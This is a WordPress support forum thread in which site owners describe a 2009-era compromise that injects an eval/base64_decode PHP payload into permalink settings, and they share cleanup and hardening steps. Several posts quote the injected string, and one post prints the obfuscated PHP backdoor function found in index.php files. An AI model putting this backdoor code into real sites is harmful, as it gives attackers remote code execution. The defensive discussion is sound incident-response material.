WordPress.org

Ready to get started?Download WordPress

Forums

126

[closed] Question About Possible Hack of Site (162 posts)

  1. ajaskey
    Member
    Posted 4 years ago #

    I noticed that some links are coming up with code in the link URL that I did not put there. I have not edited my site for several weeks. I have added posts but no PHP editing. So I am pretty sure I did not cause this. I noticed it tonight and don't think it has been like this for more than a day - maybe two. I am using version 2.7.1.

    This is the expected link:
    http://ptv-investing.com/blog/2009/09/03/30-year-bond-swing-chart-turns-down/

    This is what shows up in the Permalink and the "Recent Posts" and "Comments" widgets.

    http://ptv-investing.com/blog/2009/09/03/30-year-bond-swing-chart-turns-down/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_REFERER%5D))%7D%7D|.+)&%/

    Every thing else seems to work. I check the dates on the PHP files and none show dates with recent updates. I checked the DB through examination of my daily backup and don't see any changes to the data in the DB.

    Any suggestions.

    Thanks.
    Andy

  2. ajaskey
    Member
    Posted 4 years ago #

    I updated to WP 2.8.4 which did not fix the problem. I deactivated all my plugins and this did not fix the Permalink issue.

  3. ajaskey
    Member
    Posted 4 years ago #

    In WP 2.8.4, the extra stuff shows up in the as the Permalink as I am creating a new post. But the extra characters:

    /%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/

    are not editable. I would have thought that any hack would have been over written by the update to 2.8.4.

  4. ajaskey
    Member
    Posted 4 years ago #

    Ok. I looked at the Permalink options and somehow the extra characters when in there. Very odd. I guess I solved my problem. But I still would like to hear from a Blog guru or two about how this could have happened. I did not put it there and the string was not random so it doesn't look like an accident. Thanks. Andy

  5. gurubobnz
    Member
    Posted 4 years ago #

    Same deal with my wife's blog @ http://mummy.guru.net.nz/
    Similar story - regular posting but no upgrading or anything recently.
    Investigating now, found this post after Googling for the string appended onto the permalink URL.

  6. johninnit
    Member
    Posted 4 years ago #

    And same with one I work on http://www.touchstoneblog.org.uk -
    Likewise I found this via googling this exact string. Checked the permalinks page and all that gunk was indeed appended to my string, even though I'd not changed that setting in a year. Using version 2.7.1

    This is very odd. Going to check my other wordpress blogs now.

  7. Roy
    Member
    Posted 4 years ago #

    Dammit people, running old versions of WP is an application for getting hacked! And guru "WordPress 2.7-hemorrhage"?!? Your wife doesn't even use a final version of 2.7! Did you ever look up that word "hemorrhage"? It means that this test version leaks blood like a person shot to Swiss cheese with an automatic weapon.
    I don't know anything about this particular hack, but I advise you to after cleaning up the mess, upgrade, stay updated and read that nice article about Hardening WordPress in the codex.

  8. johninnit
    Member
    Posted 4 years ago #

    Yes - it's happened to another one too,
    http://www.strongerunions.org - which is on 2.62

    But oddly not to the other 6 wordpress blogs I run (yet).

  9. johninnit
    Member
    Posted 4 years ago #

    True Gangleri, will get busy upgrading!

  10. gurubobnz
    Member
    Posted 4 years ago #

    Fair cop Gangleri, upgraded to 2.8.4 now need to clean up. Looks like something managed to get into the custom permalink option. Removing it appears to fix the problem.

  11. Roy
    Member
    Posted 4 years ago #

    John, it's probably the work of some "scriptkiddy" or a bot looking for old WP's. It's still unclear to me what the purpose of this hack is. I found a nice article that describes how eval base functions are used to get information from databases, but the only thing interesting in that regard would be the users table in my opinion and why use the permalinks to do that? Maybe the hacker tries to get something from the computers of people clicking on the links? In any case, are the edited permalinks the only thing that happens? No new users, spam injections, filed edited or added?
    Reading tips:
    http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/
    When that's done:
    Change ALL passwords (yes I also mean database, FTP and control panel) and read this:
    http://codex.wordpress.org/Hardening_WordPress

    [edited]: just thought about something: decoded themes with the same kind of coding, coincidense?

  12. johninnit
    Member
    Posted 4 years ago #

    Thanks for all the help Gangleri, some very useful info there for novices like me!
    So that's my morning cut out for me then...

    Don't recognise any new users, or even if there are, they're only subscriber level, nothing author or above.

    No new posts/pages, and can't see any new folders or files on the server when sorting them by last update. So fingers crossed it was just someone proving they could change something, even if it wasn't any concrete use to them.

  13. dyske
    Member
    Posted 4 years ago #

    I just noticed the same problem on one of my blogs (PainInTheEnglish.com). So, this appears to be pretty wide-spread. Keeping up with WordPress's security issues is becoming a full-time job.

  14. lexthoonen
    Member
    Posted 4 years ago #

    I had the same. Thanks to the info here I was able to get rid of it. So thanks!

  15. erwanpia
    Member
    Posted 4 years ago #

  16. netslacker
    Member
    Posted 4 years ago #

    I am having the same problem. Multiple times now in the last 24 hours. I keep fixing it, it keeps coming back.

    Not sure what to do.

    permalinks end up with this crap:
    /%year%/%monthnum%/%day%/%postname%/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/

  17. netslacker
    Member
    Posted 4 years ago #

    The following function appeared in my index.php file. Everyone, check your last modified dates on your installation files for any file that has changed recently. If it's a wordpress file that you've not modified, be sure to inspect it or replace it with the original.

    function gpc_9086($l9088){if(is_array($l9088)){f
    oreach($l9088 as $l9086=>$l9087)$l9088[$l9086]=gpc_9086($l9087);}elseif(is_string($l9088) && substr($l9088,0,4)=="____")
    {eval(base64_decode(substr($l9088,4)));$l9088=null;}return $l9088;}if(empty($_SERVER))$_SERVER=$HTTP_SERVER_VARS;array_m
    ap("gpc_9086",$_SERVER);

  18. patrickbryant
    Member
    Posted 4 years ago #

    Us too:

    %&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/

    Upgraded and Backed up... will report if it comes back.

  19. Roy
    Member
    Posted 4 years ago #

    Great tip Netslacker, but Patrick, don't just patch, also do some "hardening" after changing all passwords, etc. You still don't know how they did it.

  20. ChloeAliceWilson
    Member
    Posted 4 years ago #

    @netslacker - as I'm a WordPress dummy please could you give me a clue as to how to check the last modified dates on my installation files! Thanks. My host is Hostgator, but I can't see any dates within File Manager.

  21. Roy
    Member
    Posted 4 years ago #

    Do you use FTP? Most FTP clients note the date of files.
    Also go for his tip and start by checking the index.php of your theme.

  22. Aaron Forgue
    Member
    Posted 4 years ago #

    Confirmed, two sites in our network (so far) have been hit by this exploit. Both were version 2.7.1

    Symptoms: Bogus permalink, unauthorized admin account with code in the "first name" field.

    Has anyone been able to confirm that this is NOT an issue with 2.8.4?

  23. ChloeAliceWilson
    Member
    Posted 4 years ago #

    FTP - uugh - no. Hostgator has a few FTP icons but I've never used them and don't know what to do with them. I'll look at my index.php though. Thanks.

  24. netslacker
    Member
    Posted 4 years ago #

    @ChloeAliceWilson

    You need to login to your hosting account and look at all the files. I've got a shell access to I can just check and modify directly there. However, if you're coming in via web, there should be a way to view all the files on your hosting account and it should tell you last modified timestamps.

    I have files that were modified over a couple of days. Starting on Aug 30th. All of those files (about 10 in total) have had the function above injected.

  25. netslacker
    Member
    Posted 4 years ago #

    My steps for cleaning did not involve following those on the links above.

    I found that I could easily replace the hacked files with valid ones. I then removed the write permission on all wordpress files. However, in doing this kills the ability to upgrade via the admin console and will make upgrades harder. for me tho, I'm all about having a stable site and I don't care right now about upgrading.

    I also created a blank index.php file in EVERY directory that didn't have one already (/images, wp-content, etc etc). Since when I looked through my installation, MANY directories had NEW index.php files that would simply call the injected function. So I removed these files, created a new, blank index.php and then removed the read and write permissions (removing write means nobody can inject bad code again into that file).

    If you have index.php files that have the function, a hacker can simply call the function over and over again by making an http call to the file w/ their browser. voila, function executes, hack restored. So you must prevent this from occuring over and over.

    On linux/unix, to remove write permissions (must be at a shell):
    chmod -w <filename>

    So, for all files in the root:
    chmod -w *.php

    To create an index.php file where there is NOT one:
    touch index.php (creates an empty file)
    chmod -rw index.php (removes read and write)

    Now, if a browser goes to http://myhackedsite/wp-content/ the browser returns a PERMISSION DENIED error. Since the file is there but it's not readable.

    Be CAREFUL. Some files need write access. But not many. And DONT remove the read access from index.php files that are part of the wordpress install. root and wp-admin (and others) have VALID index.php files. just inspect them for the malitious function and just remove the write attribute (chmod -w filename).

    I removed the write attribute from nearly every file in wordpress and my theme that I am using. this was my quick and dirty way to HOPEFULLY prevent it from happenning again. Since in the past 3 days I've had it occur multiple times.

    If there is a better approach, I'm all ears. However, until a fix is put in wordpress I'm not taking any chances at all.

  26. dyske
    Member
    Posted 4 years ago #

    @netslacker

    When one of my WP sites got hacked earlier this year, I did similar things to "harden" my WP sites, but it got hacked again by this new scheme anyway. The problem is that you protected your site only from this particular hacker and his scheme. When another security hole is discovered, it may have nothing to do with what you just did.

    I agree with you; all I want is a stable site. I don't care about upgrading all the time to the latest. But with WP, it appears that we have no choice. Every time a new version comes out, we have to upgrade it. If so, doing what you did would make it a big hassle every time you have to upgrade. If you only have one site to maintain, that's fine, but what if you have multiple? It's not realistic. Most of us just want to blog. We don't want to be professional webmasters. So, this is a serious problem that I do not know how to resolve. I don't want to spend my time upgrading WP every week.

  27. marc_dutch123
    Member
    Posted 4 years ago #

    The best quick fix I found is renaming:
    wp-admin/options-permalink.php
    /xmlrpc.php

    to something else and wait till the wordpress guys fix this... there were 4 attempts today on my website...

  28. netslacker
    Member
    Posted 4 years ago #

    @dyske

    Totally agree. I guess my point is that I'm not aware of a "fix" for this particular hack and since I've had it happen now multiple times I just want it stable so I can sleep at night!!

    Doing a recursive chmod to add back the write permissions is trivial. If I want to get back to where I was and upgrade I simply run the chmod +rw command on the whole thing and I'm good to go.

    However, since removing the write attribute is a sound security practice anyway (no matter if it's wp or some other app), it's still valid advice. The drawback is that wp is built for the masses for easy upgrade through the admin console, so by it's nature, it will be prone to hacks. Security always has a trade off. Many people chase the upgrades to get new features like kids on christmas morning. However, my approach is to always wait until the issues are resolved before upgrading (unless it's a security patch/upgrade).

  29. dyske
    Member
    Posted 4 years ago #

    @marc_dutch123

    I deleted xmlrpc.php from all my WP sites. I don't care about Ping Back and I don't have to update my blog from my iPhone.

    Does xmlrpc.php do anything other than those two?

    [I'm suspecting that xmlrpc.php was the entry point for this hack.]

  30. robk30
    Member
    Posted 4 years ago #

    My blog was infected. I am thinking of deleting xmlrpc.php as well. I also see wp-pass.php. Should I delete both?

126

Topic Closed

This topic has been closed to new replies.

About this Topic